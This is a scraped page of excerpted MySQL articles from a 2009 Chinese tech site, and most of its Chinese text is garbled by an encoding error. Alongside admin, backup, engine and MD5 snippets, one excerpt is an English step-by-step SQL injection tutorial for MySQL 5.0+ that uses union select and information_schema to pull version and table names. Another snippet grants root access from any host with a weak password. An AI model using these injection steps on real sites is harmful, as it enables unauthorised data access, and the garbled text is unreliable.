Ò׽ؽØͼÈí¼þ¡¢µ¥Îļþ¡¢Ãâ°²×°¡¢´¿ÂÌÉ«¡¢½ö160KB
ÈÈÃűêÇ©£º c c# c++ asp asp.net linux php jsp java vb Python Ruby mysql sql access Sqlite sqlserver delphi javascript Oracle ajax wap mssql html css flash flex dreamweaver xml
 ×îÐÂÎÄÕ : mysql

³£Óõ½µÄmysqlÃüÁî±Ê¼Ç

mysqlÉèÖÃÃÜÂëºÍÐÞ¸ÄÃÜÂ룺
/usr/local/mysql/bin/mysqladmin -uroot password 123456 µÚÒ»´ÎÉèÃÜÂë¡£
mysqladmin -uroot -p password mypasswd ÐÞ¸ÄÃÜÂë
ÊäÈëÕâ¸öÃüÁîºó£¬ÐèÒªÊäÈërootµÄÔ­ÃÜÂ룬ȻºórootµÄÃÜÂ뽫¸ÄΪmypasswd¡£
¾ÍÊÇmysql5µ¼³öµÄÓÐdefault-charactµÄÉèÖã¬mysql4²»Ö§³Ö£¬ÐèÒª¼Óskip-opt²ÎÊý£¬È磺
mysqldump -uroot -p --default-character-set=gbk -skip-opt databse > hx.sql
Ò»°ãµÄÊý¾Ýµ¼³öÓÃ
mysqldump -uroot -pÃÜÂë database > database.sql //µ¼³öÊý¾Ý¡£
mysqldump -uroot -pÃÜÂë --opt Êý¾ÝÃû ±íÃû > /home/2009_5_29.sql //±¸·ÝÊý¾ÝÖеıí
mysqldump -uroot -pÃÜÂë --databases Êý¾ÝÃû1 Êý¾ÝÃû2 > /home/2009_5_29.sql //±¸·Ý¶¼¸öÊý¾Ý¿â
mysql -u root -p book <book.sql  »òÖ±½Ó source book.sql //ÆäÖÐbookΪÊý¾Ý¿â
drop database Êý¾ÝÃû; //ɾ³ýÊý¾Ý
drop table ±íÃû;  //ɾ³ý±í
ÏÂÃæ¶ÔһЩûÓõÄÓû§É¾³ý£¬
ÏȲ鿴 mysql ĬÈÏÓÐÄÇЩÓû§¡£
 mysql µÄÓû§£¬»¹ÓÐһЩÐÅÏ¢ ÊÇ·ÅÔÚ mysql Êý¾Ý¿âµÄ¡£
mysql> use mysql;
Database changed
mysql> show tables;
¿ÉÒÔ¿´µ½ ÀïÃæµÄ±í¡£¡£¡£ÆäÖ ......

[Injection]¶ÔMYSQL 5.0·þÎñÆ÷ÒÔÉÏ°æ±¾×¢Èë


by ZaraByte
How to do a SQL Injection for MYSQL Server 5.0+
1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error
2. order by #–
Keep upping the # until you get an error.
3. union all select 1,#,#,#,#,#–
Above 6 numbers if the site you have shows more then 6 or less then since you need to add or remove them
4. Find a column # that is showed from step 2 example if there are 5 columns shown you can pick column 2
5. concat_ws(0×3A,version(),@@version) in vulnerable column
add concat_ws(0×3A,version(),@@version) to a vulnerable column like column 2 see if it shows the SQL version if it don’t try adding a – before the php?id=-# and see if you get the version
Will show the version of the SQL Server recommended that it be 5.0
6. union all select 1,group_concat(table_name),#,#,#,# from information_schema.tables where table_schema=database()–
Thi ......

MySQLÊý¾Ý¿âÒýÇæ¿ìËÙÖ¸µ¼

 Èç¹ûÄãÊǸöÈü³µÊÖ²¢ÇÒ°´Ò»Ï°´Å¥¾ÍÄܹ»Á¢¼´¸ü»»ÒýÇæ¶ø²»ÐèÒª°Ñ³µ¿ªµ½³µ¿âÀïÈ¥»»£¬ÄÇ»áÊÇÔõô¸Ð¾õÄØ£¿MySQLÊý¾Ý¿âΪ¿ª·¢ÈËÔ±Ëù×öµÄ¾ÍºÃÏñÊÇ°´°´Å¥»»ÒýÇ棻ËüÈÃÄãÑ¡ÔñÊý¾Ý¿âÒýÇ棬²¢¸øÄãÒ»Ìõ¼òµ¥µÄ;¾¶À´Çл»Ëü¡£
MySQL µÄ×Ô´øÒýÇæ¿Ï¶¨Êǹ»ÓÃÁË£¬µ«ÊÇÔÚÓÐЩÇé¿öÏ£¬ÆäËûµÄÒýÇæ¿ÉÄÜÒª±ÈÊÖÍ·ËùÓøüÊʺÏÍê³ÉÈÎÎñ¡£Èç¹ûÔ¸ÒâµÄ»°£¬ÄãÉõÖÁ¿ÉÒÔʹÓÃMySQL++ APIÀ´´´½¨×Ô¼ºµÄÊý¾Ý¿âÒýÇ棬¾ÍÏñ´ò´©Æø¸××°ÉÏ×Ô¼ºµÄ»¯ÓÍÆ÷¡£ÏÖÔÚÈÃÎÒÃÇÀ´¿´¿´Äã¸ÃÈçºÎÑ¡ÔñÒýÇ棬ÒÔ¼°ÈçºÎÔÚ¿ÉÓÃÒýÇæÖ®¼äÇл»¡£
Ñ¡ÔñÄãµÄÒýÇæ
ÄãÄÜÓõÄÊý¾Ý¿âÒýÇæÈ¡¾öÓÚMySQLÔÚ°²×°µÄʱºòÊÇÈçºÎ±»±àÒëµÄ¡£ÒªÌí¼ÓÒ»¸öеÄÒýÇ棬¾Í±ØÐëÖØбàÒëMySQL¡£½ö½öΪÁËÌí¼ÓÒ»¸öÌØÐÔ¶ø±àÒëÓ¦ÓóÌÐòµÄ¸ÅÄî¶ÔÓÚWindowsµÄ¿ª·¢ÈËÔ±À´Ëµ¿ÉÄܺÜÆæ¹Ö£¬µ«ÊÇÔÚUNIXÊÀ½çÀÕâÒѾ­³ÉΪÁ˱ê×¼¡£ÔÚȱʡÇé¿öÏ£¬MySQLÖ§³ÖÈý¸öÒýÇ棺ISAM¡¢ MyISAMºÍHEAP¡£ÁíÍâÁ½ÖÖÀàÐÍInnoDBºÍBerkley£¨BDB£©£¬Ò²³£³£¿ÉÒÔʹÓá£
ISAM
ISAM ÊÇÒ»¸ö¶¨ÒåÃ÷È·ÇÒÀú¾­Ê±¼ä¿¼ÑéµÄÊý¾Ý±í¸ñ¹ÜÀí·½·¨£¬ËüÔÚÉè¼Æ֮ʱ¾Í¿¼Âǵ½Êý¾Ý¿â±»²éѯµÄ´ÎÊýÒªÔ¶´óÓÚ¸üеĴÎÊý¡£Òò´Ë£¬ISAMÖ´ÐжÁÈ¡²Ù×÷µÄËٶȺܿ죬¶øÇÒ²»Õ¼ÓôóÁ¿µÄÄÚ´æºÍ´æ´¢×ÊÔ´¡£ISAMµÄÁ½¸öÖ÷Òª²»×ãÖ®´¦ÔÚÓÚ£¬Ëü²»Ö§ ......

¼Ç¼µã¶«Î÷£¬MSSQL£¬MySQL£¬.NETµÄMD5¼ÓÃÜ

 MSSQL:select Right(sys.fn_VarBinToHexStr(hashbytes('MD5', '123456')),32)
 MSSQL16λ:select Right(sys.fn_VarBinToHexStr(hashbytes('MD5', '123456')),16)
 MySQL:select md5('123456')
 .NET:string ½á¹û×Ö·û´®=System.Web.Security.FormsAuthentication.HashPasswordForStoringInConfigFile(ÊäÈë×Ö·û´®,"MD5");
 .NET16λ:System.Web.Security.FormsAuthentication.HashPasswordForStoringInConfigFile(str,"MD5").ToLower().Substring(8,16) ; ......

ÔÚmysqlÊý¾Ý¿âÖÐÈÕÆÚÓëlongÐ͵Äת»¯

1¡¢ÔÚmysql Êý¾Ý¿âÖУ¬“2009-09-15 00£º00£º00”ת»¯ÎªÁÐΪ³¤ÕûÐ͵ĺ¯Êý£º
select unix_timstamp("2009-09-15 00£º00£º00")*1000,
ÕâÀïҪעÒ⣬mysqlÊý¾Ý¿âÖеij¤ÕûÐÍ£¬±ÈjavaÖеij¤ÕûÐÍÉÙÁËÃëºóÃæµÄºÁÃëÊý£¬ËùÒÔÒª³ËÒÔ1000£¬ÕâÑùÖ»Óм¸ºÁÃëÖ®²î
2¡¢ÔÚmysqlÊý¾Ý¿âÖУ¬“1252999488000”£¨javaÖеÄlongÐÍÊý¾Ý£©×ª»¯ÎªÈÕÆÚ£º
select from_unixtime(1252999488);
×¢Ò⣺Ҫ½«×îºóÈýλȥµô
......

linuxÏÂmysqlµÄʹÓÃ


Æô¶¯mysql:  /etc/rc.d/init.d/mysql start
ÐÞ¸ÄÃÜÂë: ¸ñʽ£ºmysqladmin -uÓû§Ãû -p¾ÉÃÜÂë password ÐÂÃÜÂë
ʹÓÃÃÜÂëµÇ¼:  mysql -u root -p
ÏÔʾÊý¾Ý¿â:  show databases;
Ñ¡ÔñÊý¾Ý¿â:  use Êý¾Ý¿âÃû;
ÏÔʾ±í:  show tables;
ÏÔʾ±í½á¹¹:  descibe ±íÃû;
Ô¶³ÌµÇ¼mysqlÐèÒª¿ªÆôȨÏÞ: 
grant ȨÏÞÃû(all±íÈ«²¿) on ¿âÃû(*±íÈ«²¿).±íÃû(*±íÈ«²¿) to Óû§Ãû@"%"(%±íÈ«²¿IP) identified  by "ÃÜÂë"
ÀýÈç: grant all on *.* to root@"%" identified by "111111"
²é¿´mysqlµÄ°æ±¾ÐÅÏ¢: \s
ÅжÏÊÇ·ñÖ§³Ö·ÖÇø: show variables like '%partition%'
......

linuxÏÂmysqlµÄʹÓÃ


Æô¶¯mysql:  /etc/rc.d/init.d/mysql start
ÐÞ¸ÄÃÜÂë: ¸ñʽ£ºmysqladmin -uÓû§Ãû -p¾ÉÃÜÂë password ÐÂÃÜÂë
ʹÓÃÃÜÂëµÇ¼:  mysql -u root -p
ÏÔʾÊý¾Ý¿â:  show databases;
Ñ¡ÔñÊý¾Ý¿â:  use Êý¾Ý¿âÃû;
ÏÔʾ±í:  show tables;
ÏÔʾ±í½á¹¹:  descibe ±íÃû;
Ô¶³ÌµÇ¼mysqlÐèÒª¿ªÆôȨÏÞ: 
grant ȨÏÞÃû(all±íÈ«²¿) on ¿âÃû(*±íÈ«²¿).±íÃû(*±íÈ«²¿) to Óû§Ãû@"%"(%±íÈ«²¿IP) identified  by "ÃÜÂë"
ÀýÈç: grant all on *.* to root@"%" identified by "111111"
²é¿´mysqlµÄ°æ±¾ÐÅÏ¢: \s
ÅжÏÊÇ·ñÖ§³Ö·ÖÇø: show variables like '%partition%'
......
×ܼǼÊý:2220; ×ÜÒ³Êý:370; ÿҳ6 Ìõ; Ê×Ò³ ÉÏÒ»Ò³ [347] [348] [349] [350] 351 [352] [353] [354] [355] [356]  ÏÂÒ»Ò³ βҳ
© 2009 ej38.com All Rights Reserved. ¹ØÓÚE½¡ÍøÁªÏµÎÒÃÇ | Õ¾µãµØͼ | ¸ÓICP±¸09004571ºÅ